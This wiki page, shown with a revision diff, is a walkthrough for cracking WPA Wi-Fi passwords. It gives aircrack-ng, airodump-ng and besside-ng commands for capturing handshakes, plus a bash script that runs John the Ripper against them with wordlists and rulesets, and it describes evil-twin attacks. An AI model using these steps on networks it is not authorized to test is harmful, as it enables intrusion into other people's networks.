Kali/Wireless Reboot: Difference between revisions
From charlesreid1
| Line 163: | Line 163: | ||
So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using? | So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using? | ||
===Client Attacks: Evil Twin=== | |||
Client attacks are essentially about tricking the client into connecting to you, and not the access point. This enables you to carry out attacks like the evil twin attack, in which a client connects to an access point they recognize, but it is not the access point but in fact an attacker creating a fake access point. This is principally made possible by the information phones and laptops leak about wireless networks that you have associated with previously. When you select to remember wireless networks on a device, it is constantly broadcasting those prior associations, allowing an attacker to create an Evil Twin. | |||
(This is similar to the idea behind the Hak5 Pineapple - creating an AP that automatically cycles through a whole bunch of network names that were collected from this prior association data, in an attempt to get phones to automatically connect to the device and pass along an (encrypted) handshake.) | |||
=Flags= | =Flags= | ||
Revision as of 19:07, 18 August 2016
Reboot
Revisiting some of the old techniques.
Classic WPA Cracking
Monitor wireless
First is aircrack to monitor wifi networks.
Start by putting the wifi card in monitor mode:
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity:
$ airodump-ng -i wlan1 -w output_file
This will output information about wireless network activity to a file.
Obtain handshakes
You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.
Specify -W for wpa only, and specify your network interface:
$ besside-ng -W wlan1
That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.
Crack handshakes
Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap $ hccap2john ./wpa.hccap > booty.johnpw
Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:
#!/bin/sh
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
cap="wpa.cap"
pwdir="/root/box/08_besside"
# Round 0
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)
# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")
# ===========================
# The Actual Work
for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
echo ""
echo ""
echo "*** * * ** **** * ***** ** ** * * * ** ****"
echo "* ** * *** **** *** * ** ** *** * * * *** *"
echo " * ***** * * * * *** * * * * * *** * * *"
echo "* * * * * * *** **** * *** * * * * * * *** *"
echo ""
echo ""
echo "Now on password file ${pwfile}"
echo ""
for rules in "${rulesets[@]}";
do
echo ""
echo ""
echo " .. . .. . .... ... . . ... .. . .. . . . ."
echo "... ... .. ...... . .. . . . .... .... ."
echo "... . .. . . . .. .... . . . . . ... . "
echo ""
echo ""
echo "Now on ruleset file ${rules}"
echo ""
for wordlist in "${wordlists[@]}";
do
echo ""
echo "---------------------------"
echo "Running John the Ripper with options:"
echo "Wordlist: ${wordlist}"
echo "Ruleset: ${rules}"
echo "Password File: ${pwfile}"
if [ "${rules}" == "" ] ; then
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
else
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
fi
done
done
done
|
Settle in, because we'll be here a while.
Alternatives to Cracking WPA
So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?
Client Attacks: Evil Twin
Client attacks are essentially about tricking the client into connecting to you, and not the access point. This enables you to carry out attacks like the evil twin attack, in which a client connects to an access point they recognize, but it is not the access point but in fact an attacker creating a fake access point. This is principally made possible by the information phones and laptops leak about wireless networks that you have associated with previously. When you select to remember wireless networks on a device, it is constantly broadcasting those prior associations, allowing an attacker to create an Evil Twin.
(This is similar to the idea behind the Hak5 Pineapple - creating an AP that automatically cycles through a whole bunch of network names that were collected from this prior association data, in an attempt to get phones to automatically connect to the device and pass along an (encrypted) handshake.)
Flags
 |
Wireless all things wireless.
Software:
|
|
aircrack-ng a suite of tools for wireless cracking.
aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information
airodump-ng Basic Usage of Airodump
Category:Security · Category:Wireless · Category:Passwords
|